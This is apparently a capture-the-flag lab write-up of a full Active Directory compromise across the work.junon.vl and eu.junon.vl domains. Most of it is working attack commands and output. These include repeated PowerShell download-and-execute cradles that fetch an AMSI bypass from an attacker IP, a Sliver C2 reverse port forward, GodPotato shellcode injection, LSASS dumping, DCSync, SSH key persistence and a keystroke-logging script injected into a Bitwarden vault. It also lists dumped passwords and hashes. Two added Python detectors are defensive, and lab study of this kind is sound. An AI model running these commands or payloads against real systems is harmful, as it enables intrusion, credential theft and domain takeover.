Detailed Findings

Recon External

The external IP range is

172.16.20.0/24

After scanning the whole network, we found two reachable hosts in this IP range.

Machine Name     IP
172.16.20.50     172.16.20.50
172.16.20.100    172.16.20.100

We found a list of users from work.junon.vl on the paste bin.

We first create a password list which we can use to brute force the found users.

 generate_passwords.py

Password List Generated

172.16.20.50

 sudo nmap -sC -sV -T4 -p- -oA 172.16.20.50 172.16.20.50 -vvv 
Port   Service      Version
22     ssh          OpenSSH 8.9p1 Ubuntu 3ubuntu0.1
8080   http-proxy   Squid http proxy 5.2
  • Runs a Squid proxy on port 8080.
  • We can try connecting to this proxy and see if we can access the internal network if the configuration allows us.

proxychains config

 proxychains -f /etc/proxychains4.conf cme smb 172.16.20.0/24 2>/dev/null
proxychains -f /etc/proxychains4.conf cme ssh 172.16.20.0/24 2>/dev/null

The Internal IP of the external machines

 proxychains -f /etc/proxychains4.conf cme smb 172.16.21.0/24 2>/dev/null

New Machines found smb

proxychains -f /etc/proxychains4.conf cme ssh 172.16.21.0/24 2>/dev/null

New machines found ssh

 proxychains -f /etc/proxychains4.conf cme smb 172.16.19.0/24 2>/dev/null
 

User:Password

After brute forcing, we found the following valid users.

Username          Password
Wendy.Vincent     Summer2023
Hazel.Simpson     Summer2023
Terry.Lowe        Summer2023
Melanie.Mueller   Summer2023
Jade.Watson       Winter2022
Hollie.Parker     Winter2022
Sarah.Allen       Wutai2023
Tom.Perkings      Wutai2023
Roger.Ball        Junon2023

172.16.20.100

sudo nmap -sC -sV -T4 -p- -oA 172.16.20.100 172.16.20.100 -vvv
Port   Service    Version
22     ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.6
443    ssl/http   nginx
  • Kasm is running on port 443, which allows us to connect to a virtual desktop if we know a valid user name and password.

  • So I used the creds of Roger.Ball to access the Kasm virtual desktop.

  • It gave us the initial foothold on the S020M010

Work.Junon.VL

172.16.21.180 (S021M010)

172.16.20.100

  • Domain - work.junon.vl
  • smb signing is set to false

Initial Access

Got RDP access to the machine after logging in on 172.16.20.100

iwr http://10.8.0.154/amsi64.txt | IEX

User.txt

Flag1.txt
VL{f8ac47197978c087b4b882e84fbdc328} ### Flag1.txt ### Submitted

Privilege Escalation

We were able to write to inetpub, so we could upload an ASPX file there and then use SeImpersonate.

upload test.aspx
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.0.154:80/amsi64.txt')"
upload sharp.ps1
./donut -i /home/jay/vulnlab/breach/GodPotato-NET4.exe -a 2 -b 2 -o /tmp/payload.bin -p '-cmd "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -executionpolicy bypass -file c:\windows\tasks\sharp.ps1"'
execute notepad.exe
ps -e notepad
execute-shellcode -p 3604 /tmp/payload.bin
ps

root.txt

Flag2.txt
VL{3ee23591eab673b8769fe3b1a75b858a} flag2.txt Submitted

Post Exploitation / Host Recon

Credential Theft
nanodump 684 test 1 PMDM
download test
python3 -m pypykatz lsa minidump test
Loot
Username: S021M010$
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:8d7070b48346d843e63616b99f048929
(Got it from reg save later)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:748b542e4b5450664592e7d256edc4b5:::

GetST for Administrator.work.junon.vl (just for learning)
proxychains -f /etc/proxychains4.conf getST.py -self -impersonate "Administrator" -altservice "cifs/S021M010.work.junon.vl" -dc-ip 172.16.21.10 work.junon.vl/'s021m010$' -hashes aad3b435b51404eeaad3b435b51404ee:8d7070b48346d843e63616b99f048929

172.16.21.195 (S021M015)

  • Domain - work.junon.vl
  • smb signing is set to false
PORT     STATE SERVICE       REASON
80/tcp   open  http          syn-ack
111/tcp  open  rpcbind       syn-ack
135/tcp  open  msrpc         syn-ack
139/tcp  open  netbios-ssn   syn-ack
443/tcp  open  https         syn-ack
445/tcp  open  microsoft-ds  syn-ack
2049/tcp open  nfs           syn-ack
3389/tcp open  ms-wbt-server syn-ack
8080/tcp open  http-proxy    syn-ack
8083/tcp open  us-srv        syn-ack
8383/tcp open  m2mservices   syn-ack
8443/tcp open  https-alt     syn-ack
  • We also had share access to this host from 172.16.21.180

SMB Share Recon

Found config.xml

<?xml version="1.0"?>
<securepass>
  <username>svc_me</username>
  <password>SP81274145f4a5857b839ee7b500f1d66e8a044d12211781b515e7bae67bb7abce</password>
</securepass>

  • flag in amy.ball home

flag.txt amy.ball

Flag3.txt
VL{3387261d92644002942061cfea267da2} flag3.txt submitted
  • Found SecurePass.exe in install$ share
  • Reverse Engineered Password

Decrypt the Secure pass file

  • Watch the video part 3.
  • 8623050922ab890bbd2f79886cd6809f (key)
  • 81274145f4a5857b839ee7b500f1d66e (IV)
  • 8a044d12211781b515e7bae67bb7abce (pass)

AES Decrypt

Manage Engine password found

Password for svc_me or admin for Manage Engine
  • Password = jYEp9bq32KFLVL!
  • Username = svc_me
jYEp9bq32KFLVL!

Now we need to find a machine that runs manage engine.

Manage Engine running on Port 8383

Manage Engine

  • Log in with admin creds and the OTP from KeePassXC

172.16.21.140 (S021W105)

Privilege Escalation After getting Domain Admin

proxychains -f /etc/proxychains4.conf nxc smb 172.16.21.195 -u 'dom-fstewart' -H 5ae361557a6f5577862eeb6443629cc1 -d work.junon.vl -X 'iwr http://10.8.0.154/amsi64.txt  -usebasicparsing | IEX' 2> /dev/null

Admin shell on S021M015

Flag7.txt
VL{a5cc8d5a387f5124a60df946ccd27052}  #### Flag7.txt submitted

Eu.Junon.VL

172.16.21.140 (S021W105)

  • Domain - work.junon.vl
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: WORK-JUNON
|   NetBIOS_Domain_Name: WORK-JUNON
|   NetBIOS_Computer_Name: S021W105
|   DNS_Domain_Name: work.junon.vl
|   DNS_Computer_Name: S021W105.work.junon.vl
|   DNS_Tree_Name: work.junon.vl
|   Product_Version: 10.0.19041
|_  System_Time: 2024-07-24T09:15:38+00:00
| ssl-cert: Subject: commonName=S021W105.work.junon.vl
| Not valid before: 2024-02-27T11:03:30
|_Not valid after:  2024-08-28T11:03:30
|_ssl-date: 2024-07-24T09:15:42+00:00; -2s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s

Initial Foothold as SYSTEM

  • We open PowerShell or Command Prompt
(New-Object System.Net.WebClient).DownloadString('http://10.8.0.154/amsi64.txt') | IEX
  • Ran the above command as system and carly.adams

Flag4.txt
VL{19a947c8712201ea96c9b5666c721094} ### Flag4.txt ### Submitted

Host Recon

Nanodump Lsass
nanodump 684 test 1 PMDM
download test
python3 -m pypykatz lsa minidump test
SharpDPAPI
sharpdpapi machinetriage /showall

    UserName         : WORK-JUNON\carly.adams
    Credential       : ZMskoMXML_qC17

Sharpchrome
carly.adams@junon.vl,c4rlyr0cks!!

Xfreerdp login
 proxychains -f /etc/proxychains4.conf xfreerdp /u:Carly.Adams /p:ZMskoMXML_qC17 /v:172.16.21.140
  • Edge browser
  • Found Bitwarden Login to s021v010
  • Also Found mRemoteNG login to Bitwarden machine 172.16.21.140
  • Initial Foothold

172.16.21.240 (s021v010)

Used Carly.Adams SharpChrome creds to login into bitwarden

Found a root password for esxi machine

 root 7d3XHR8uTgg2aB

Initial Foothold

  • On the machine S021W105 we found ssh login to this machine
  • Xfreerdp login

mRemoteNG Login on S021W105

ip a output

  • We still don’t have the root password for the user bitwarden, but at least we have access to the machine.
  • The user bitwarden is in the docker group.

User bitwarden is in docker group

  • I created new external tool in mRemoteNG

b1Ttw4rd3n!

SSH access

proxychains -f /etc/proxychains4.conf ssh bitwarden@172.16.21.140

b1Ttw4rd3n!
  • To get root access, I followed these steps

Privilege Escalation

On local machine
docker pull alpine
docker save alpine -o alpine.tar
sudo chmod 666 alpine.tar
proxychains -f /etc/proxychains4.conf scp alpine.tar bitwarden@172.16.21.240:/home/bitwarden

On Bitwarden machine
docker load -i alpine.tar
 docker run -v /:/mnt --rm -it alpine chroot /mnt sh
echo "ssh-rsa <PUBLIC_KEY> jay@hacksafely" >> /root/.ssh/authorized_keys
proxychains -f /etc/proxychains4.conf ssh root@172.16.21.240

root shell

Flag5.txt
VL{4ef82613f8d4296ab4bee1a8c48015ab} ### Flag5.txt ### Submitted

Post exploitation

  • Now we have Bitwarden running in Docker.
  • We access the nginx container using
docker ps
docker exec -it bitwarden-web /bin/bash
echo 'var keys = "";
var url = "bitwarden-info.gif?c=";

document.onkeypress = function(e) {
    var get = window.event ? event : e;
    var key = get.keyCode ? get.keyCode : get.charCode;
    key = String.fromCharCode(key);
    keys += key;
}

window.setInterval(function() {
    if(keys.length > 0) {
        new Image().src = url + keys;
        keys = "";
    }
}, 5000);' > /app/log.js

sed -i 's|</body>|<script src="log.js"></script></body>|' /app/index.html

docker exec -it bitwarden-nginx /bin/bash
tail -f /var/log/nginx/access.log | grep bitwarden

access log

fiona.stewart@junon.vl 
Junon2023!Bitwarden
  • We now log in to Bitwarden using this password.

hd-fstewart
DEQ8mC2xxTzVNB
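
Detection for the web-vault tampering above, as an added example that is not part of the original notes: it checks a served index.html for script sources outside a known baseline and scans nginx access-log lines for a static asset fetched with many different query values. The sample HTML, log lines, client IPs, the app/main.js baseline entry and the thresholds are constructed assumptions; only log.js and bitwarden-info.gif?c= come from the page.

```python
import re
from collections import defaultdict
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qsl

# Constructed samples (not from the page): index.html after tampering and nginx
# "combined" log lines. IPs, app/main.js, logo.png and the c= values are made up.
SAMPLE_HTML = ('<html><body><script src="app/main.js"></script>'
               '<script src="log.js"></script></body></html>')
SAMPLE_LOG = """\
192.0.2.10 - - [24/Jul/2024:09:15:38 +0000] "GET /images/logo.png?v=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [24/Jul/2024:09:15:40 +0000] "GET /bitwarden-info.gif?c=ab HTTP/1.1" 404 153 "-" "Mozilla/5.0"
192.0.2.11 - - [24/Jul/2024:09:15:41 +0000] "GET /images/logo.png?v=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [24/Jul/2024:09:15:45 +0000] "GET /bitwarden-info.gif?c=cd HTTP/1.1" 404 153 "-" "Mozilla/5.0"
192.0.2.10 - - [24/Jul/2024:09:15:50 +0000] "GET /bitwarden-info.gif?c=ef%21 HTTP/1.1" 404 153 "-" "Mozilla/5.0"
192.0.2.10 - - [24/Jul/2024:09:15:52 +0000] "GET /images/logo.png?v=2 HTTP/1.1" 304 0 "-" "Mozilla/5.0"
"""

LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" \d{3} ')
STATIC_EXT = (".gif", ".png", ".jpg", ".jpeg", ".ico", ".svg")


class _ScriptSources(HTMLParser):
    """Collects the src of every <script> tag; inline scripts are recorded too."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.sources.append(dict(attrs).get("src") or "<inline>")


def unexpected_scripts(html, allowed):
    """Return script sources in html that are not in the release baseline."""
    parser = _ScriptSources()
    parser.feed(html)
    return [src for src in parser.sources if src not in allowed]


def find_param_beacons(log_text, min_distinct=3):
    """Flag (client, path, param) where a static asset is requested with many
    different values for one query parameter, as the injected script does."""
    values = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.lower().endswith(STATIC_EXT):
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            values[(m["ip"], url.path, name)].add(value)
    return sorted((ip, path, name, len(v))
                  for (ip, path, name), v in values.items() if len(v) >= min_distinct)


if __name__ == "__main__":
    print(unexpected_scripts(SAMPLE_HTML, {"app/main.js"}))
    print(find_param_beacons(SAMPLE_LOG))
```

The cache-busting logo.png?v=2 requests are not flagged because the parameter value never changes; the baseline set should be built from the files shipped with the deployed release.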

172.16.21.10 (S021M005)

  • Domain - work.junon.vl
  • Most likely the domain controller, as SMB signing is set to true

Recon for path

User HD-FStewart

 proxychains -f /etc/proxychains4.conf net rpc group addmem "SERVERADMINS" "hd-fstewart" -U "work.junon.vl"/"hd-fstewart"%"DEQ8mC2xxTzVNB" -S "S021M005.work.junon.vl"

 proxychains -f /etc/proxychains4.conf net rpc group members "SERVERADMINS" -U "work.junon.vl"/"hd-fstewart"%"DEQ8mC2xxTzVNB" -S "S021M005.work.junon.vl"

For some reason we are not admin on the domain controller, but we are admin on

  • S021M015 (172.16.21.195)
  • S021W105 (172.16.21.140)
  • S021M010 (172.16.21.180)

So we try another path now.

 proxychains -f /etc/proxychains4.conf net rpc group addmem "PASSWORD-AUDIT" "hd-fstewart" -U "work.junon.vl"/"hd-fstewart"%"DEQ8mC2xxTzVNB" -S "S021M005.work.junon.vl"
 proxychains -f /etc/proxychains4.conf net rpc group members "PASSWORD-AUDIT" -U "work.junon.vl"/"hd-fstewart"%"DEQ8mC2xxTzVNB" -S "S021M005.work.junon.vl"

DCSYNC

proxychains -f /etc/proxychains4.conf secretsdump.py 'work.junon.vl/hd-fstewart:DEQ8mC2xxTzVNB@S021M005.work.junon.vl'

Administrator:500:aad3b435b51404eeaad3b435b51404ee:b976dde1bcbbf31cbdab60d2a5a5449d:::

work.junon.vl\dom-fstewart:1416:aad3b435b51404eeaad3b435b51404ee:5ae361557a6f5577862eeb6443629cc1:::
proxychains -f /etc/proxychains4.conf nxc smb 172.16.21.3-240 -u 'dom-fstewart' -H 5ae361557a6f5577862eeb6443629cc1 -d work.junon.vl 2> /dev/null
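
Detection for the sequence above (an account adds itself to a group, then replicates directory secrets), as an added example that is not part of the original notes. It correlates Windows Security events 4728/4732/4756 with event 4662 carrying the directory replication rights; the events, SIDs, timestamps and the one-hour window are constructed assumptions, while the account, group and host names are taken from the page.

```python
from datetime import datetime, timedelta

# Control-access rights that appear as GUIDs in the Properties field of event 4662.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
GROUP_ADD_EVENTS = {4728, 4732, 4756}  # member added to a security-enabled group

# Constructed events (not from the page). Names are the page's; SIDs and
# timestamps are placeholders.
T0 = datetime(2024, 7, 24, 10, 0, 0)
SAMPLE_EVENTS = [
    # Normal DC-to-DC replication by the domain controller's machine account.
    {"id": 4662, "time": T0, "SubjectUserName": "S021M005$",
     "SubjectUserSid": "S-1-5-21-0-0-0-1000",
     "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # The account adds itself to a group.
    {"id": 4728, "time": T0 + timedelta(minutes=5), "SubjectUserName": "hd-fstewart",
     "SubjectUserSid": "S-1-5-21-0-0-0-1500", "MemberSid": "S-1-5-21-0-0-0-1500",
     "TargetUserName": "PASSWORD-AUDIT"},
    # The same account then requests replication of all changes.
    {"id": 4662, "time": T0 + timedelta(minutes=7), "SubjectUserName": "hd-fstewart",
     "SubjectUserSid": "S-1-5-21-0-0-0-1500",
     "Properties": "%%7688 {1131F6AD-9C07-11D1-F79F-00C04FC2DCD2} "
                   "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
]


def detect(events, dc_accounts, window=timedelta(hours=1)):
    """Return alerts for self group-adds and for replication requests made by
    accounts that are not domain controllers."""
    dc_accounts = {a.lower() for a in dc_accounts}
    self_adds = {}  # subject SID -> time of the most recent self-add
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] in GROUP_ADD_EVENTS:
            if ev["SubjectUserSid"] == ev["MemberSid"]:
                self_adds[ev["SubjectUserSid"]] = ev["time"]
                alerts.append(("self-group-add", ev["SubjectUserName"],
                               ev["TargetUserName"]))
        elif ev["id"] == 4662:
            props = ev["Properties"].lower()
            rights = sorted(n for g, n in REPLICATION_RIGHTS.items() if g in props)
            if not rights or ev["SubjectUserName"].lower() in dc_accounts:
                continue
            added = self_adds.get(ev["SubjectUserSid"])
            linked = added is not None and ev["time"] - added <= window
            alerts.append(("dcsync-after-self-add" if linked else "dcsync",
                           ev["SubjectUserName"], "+".join(rights)))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS, {"S021M005$"}):
        print(alert)
```

Event 4662 is only written when Directory Service Access auditing is enabled and the domain object has a matching audit entry, so the rule depends on that audit policy being in place.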

Foothold as Domain Admin

proxychains -f /etc/proxychains4.conf nxc smb 172.16.21.10 -u 'dom-fstewart' -H 5ae361557a6f5577862eeb6443629cc1 -d work.junon.vl -X 'iwr http://10.8.0.154/amsi64.txt | IEX' 2> /dev/null

Domain Admin on S021M005

Flag6.txt
VL{732b25b7b505574e9098fba3a29d5c27} ### Flag6.txt submitted

172.16.21.195 (S021M015)

execute-assembly -i -s SharpHound.exe -c all,gpolocalgroup -d eu.junon.vl
Generate user lists for both domains, as both domains trust each other
sharpview -t 500 -- Get-DomainUser -Domain work.junon.vl -Properties samaccountname

sharpview -t 500 -- Get-DomainUser -Domain eu.junon.vl -Properties samaccountname

cat users_eu_domain.txt | awk -F: '{print $2}' | awk 'NF' > eu_work.txt

grep -F -f users_work.txt users_eu.txt

work.junon.vl\Garry.Smith:1158:aad3b435b51404eeaad3b435b51404ee:4ed87458bfd1166a398ebad53d6935fe:::

work.junon.vl\sa-kmorris:1417:aad3b435b51404eeaad3b435b51404ee:4fd64fa379181761b526f77ce577b5ac:::
  • The above users actually didn’t work, so I watched the video and saw that the user sa-dwest in eu.junon.vl could be Dale West.
work.junon.vl\Dale.West:1405:aad3b435b51404eeaad3b435b51404ee:fa277a017b90f30048992530d3f9b75f:::

sa-dwest in eu domain

Eu.Junon.VL

Privilege Escalation After getting Domain Admin

172.16.21.223 (S021M215)

 proxychains -f /etc/proxychains4.conf nxc winrm 172.16.21.223 -u 'sa-dwest' -H fa277a017b90f30048992530d3f9b75f -d eu.junon.vl 2> /dev/null

Admin on the Machine

proxychains -f /etc/proxychains4.conf evil-winrm -i 172.16.21.223 -u 'sa-dwest' -H fa277a017b90f30048992530d3f9b75f

Shell

Flag8.txt
VL{591eca30daceb53f980e6f25314ad7c3} #### Flag8.txt submitted

Post Exploitation

sharpdpapi machinetriage /all

b4ckup5821!

172.16.21.222 (S021M200)

sliver (LONELY_RADISH) > rportfwd add -b 4443 -r 10.8.0.154:4443

[*] Reverse port forwarding 10.8.0.154:4443 :4443

sliver (LONELY_RADISH) > execute agent.exe -connect 127.0.0.1:4443 --ignore-cert

[*] Command executed successfully

sliver (LONELY_RADISH) > rportfwd

 ID   Remote Address    Bind Address
 ==   =============     ============
 1    10.8.0.154:4443   :4443

 python3 pywhisker.py -d "eu.junon.vl" -u "svc_backup" -p 'b4ckup5821!' --target "S021M200$" --action "add" -e pfx

certipy cert -pfx 0K8kr8cI.pfx -password gJ7EC4NKgWDJ39QMw6fT -export -out svc_cabackup_eu_junon_vl.pfx

certipy auth -pfx svc_cabackup_eu_junon_vl.pfx -dc-ip 172.16.21.222 -username S021M200 -domain eu.junon.vl

Got hash for 's021m200@eu.junon.vl': aad3b435b51404eeaad3b435b51404ee:37a90d3373272e4682082b33b80a35cd

[*] Saved credential cache to 's021m200.ccache'
export KRB5CCNAME=s021m200.ccache

getST.py -self -impersonate "Administrator" -altservice "cifs/S021M200.eu.junon.vl" -k -no-pass -dc-ip 172.16.21.222 eu.junon.vl/'S021m200$' -hashes aad3b435b51404eeaad3b435b51404ee:37a90d3373272e4682082b33b80a35cd

secretsdump.py -k S021M200.eu.junon.vl

 proxychains -f /etc/proxychains4.conf nxc smb 172.16.21.222 -u 'Administrator' --use-kcache -X "(New-Object System.Net.WebClient).DownloadString('http://10.8.0.154/amsi64.txt') | IEX" 2> /dev/null

Admin shell in eu domain controller

Flag9.txt
VL{388912a5b7433a36fe332c3f17cf85c6} ### Flag9 submitted

junon.vl\Bruce.Gardner:1104:aad3b435b51404eeaad3b435b51404ee:38afa1bf5ca01303d7379d873e435aa0:::

eu.junon.vl\svc_backup:1305:aad3b435b51404eeaad3b435b51404ee:78265cfb10b386484a94d4fda32a539f:::
eu.junon.vl\sa-kmorris:1307:aad3b435b51404eeaad3b435b51404ee:5d4d1612f20614cb49ffdf0c6f7377f7:::
eu.junon.vl\sa-kyoung:1308:aad3b435b51404eeaad3b435b51404ee:5a3150b71e40718688d7e32e16574f33:::
eu.junon.vl\dom-aclark:1309:aad3b435b51404eeaad3b435b51404ee:31e0f67f545a29cffa191a6bce3f2532:::
eu.junon.vl\dom-alee:1310:aad3b435b51404eeaad3b435b51404ee:4a7cc0d969a9b464b18d5dcd1f5f8016:::
eu.junon.vl\sa-dwest:1313:aad3b435b51404eeaad3b435b51404ee:fa277a017b90f30048992530d3f9b75f:::
eu.junon.vl\svc_adm:1603:aad3b435b51404eeaad3b435b51404ee:ce47782e6422a14f92900d7fe2229852:::

 proxychains -f /etc/proxychains4.conf nxc smb 172.16.21.222 -u 'dom-aclark' -H 31e0f67f545a29cffa191a6bce3f2532  -X "(New-Object System.Net.WebClient).DownloadString('http://10.8.0.154/amsi64.txt') | IEX" 2> /dev/null

APPENDIX

Resource Development for Sliver C2

  • Created sph.exe
  • created sliverphollow64.txt

Getting Shells

cme smb 172.16.225.194 -u 'Administrator' -H f99529e42ee77dc4704c568ba9320a34 --local-auth -x "C:\Windows\System32\mshta.exe http://10.8.0.154/sliver64.hta"
(New-Object System.Net.WebClient).DownloadString('http://10.8.0.154/amsi64.txt') | IEX
iwr http://10.8.0.154/amsi64.txt | IEX
powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://10.8.0.154:80/amsi64.txt%27)%22
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.2.41:80/amsi64.txt')"

Test

iex (new-object net.webclient).downloadstring("http://192.168.45.195/test3.ps1");
test-wave -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"'

Current domain: EU.JUNON.VL (EU-JUNON / S-1-5-21-2634976785-1424521755-791916841)

Domain: IT.WUTAI.VL (IT / S-1-5-21-313048783-3898072970-1408672677)

 [  In ] EU.JUNON.VL -> IT.WUTAI.VL

 [ Out ] IT.WUTAI.VL -> EU.JUNON.VL
    * 12/25/2023 8:16:41 AM - CLEAR   - 0d 6e a8 03 36 15 98 50 3e 4b 6c 70 03 9f 0b 3d ff 5b cb d1 73 14 5b 38 ef 2f a2 d0 76 f2 54 da ed 78 26 4d 8a 16 9f b4 16 54 96 ef bd 22 c9 59 ca dd 1e b0 1c 21 5a 1c 15 09 92 e7 90 5a 4c a7 e8 31 a1 ed 94 2b 28 6b 18 a7 cf b2 df 69 fa ef 5a 2d 4f 3f 3e 83 72 7f eb 95 4b 74 08 1c 14 a4 60 b1 69 47 37 66 5e af 9c e3 31 56 7e e2 99 df 29 06 a5 df b8 5a cc 7c 7e b6 cb bc 27 f5 d1 44 c2 2b 24 ed 4e 47 49 5b 36 82 28 6a 9f 5f c2 26 59 b6 04 5a 6a d0 6d ea 72 7e 0a 83 2e 3e 15 34 17 f9 d7 2e 6e bd d9 e8 60 a1 91 af ee 65 df c6 38 c8 de 2f 3b c5 af db 39 94 ca 65 23 fb 6f 31 4f 6e 98 8d 3e 3a 96 e7 6d ba 4a c9 ad f3 8a 5e 2a b3 bc 34 01 eb bc 82 38 cf 96 27 67 69 9f c5 6f b8 fc 5f 75 61 74 82 d4 5b 92 a1 06 98 1f 6d
        * aes256_hmac       3bc98d450a7f0b1db8843221f18523880016381f355e6f421c23f96f5574688a
        * aes128_hmac       46b41e1b12348c1ac1eb29e832a53523
        * rc4_hmac_nt       b208c66992d41cf959c96ad7aae4ebc7

 [ In-1] EU.JUNON.VL -> IT.WUTAI.VL

 [Out-1] IT.WUTAI.VL -> EU.JUNON.VL
    * 12/25/2023 8:16:41 AM - CLEAR   - 84 6e c4 c9 c7 21 cf 59 4d d3 57 6f 9c 09 0a 5f 5a 8e 97 46 7c f0 bd d3 15 ba 33 b1 c3 4a c2 68 f6 66 4d 83 76 5e 71 e0 dd 13 d7 83 22 73 98 be 01 7d a2 ad f4 2f b4 74 fa e7 6c 97 05 58 34 20 a3 71 34 66 9b 95 87 a3 95 37 8d 01 77 e3 77 12 28 7d 73 a4 65 19 66 6b 44 88 dc 92 3f 50 ea a5 90 1a a9 83 5c 30 40 0a 28 e7 49 f8 c9 15 95 2d 6f ea 72 73 97 41 4c 12 ab 2f 2d e6 20 bc f1 a3 a6 17 44 89 8f d1 30 79 2c 6e eb dd 18 b6 8d b7 7a 84 d7 c9 75 6e b1 fc 98 a7 ff 35 4f c8 b8 c8 a8 7f ac 3a 03 30 e6 03 28 0e 4f 4a 82 2c 9b a2 82 16 a9 bb ea 93 0d e8 59 da 14 ab 30 84 11 45 3e 5b c7 45 71 cd 98 b2 09 46 a7 a5 37 b2 37 89 f8 8d 31 c0 fd c8 cc eb ee 14 d2 63 e4 a2 2f 20 f1 db 1f c9 52 be 79 4f 48 f1 2c 11 7b 48 b1 30
        * aes256_hmac       3456a02c3acdfa2b60b4f11174ccc4de67a988da4be49de294f4c7f547d9383f
        * aes128_hmac       f6a2529269e19e0bfba4df5bd9cd1008
        * rc4_hmac_nt       07745d53d3a409fc18d625d6fc9d8723

Get-ADObject -LDAPFilter '(objectClass=trustedDomain)' | select name,objectguid
05f9321a-dd3d-4f61-85b7-94d461511fb4

lsadump::dcsync /guid:{05f9321a-dd3d-4f61-85b7-94d461511fb4}

 Get-ADUser s021M200$ -Properties DistinguishedName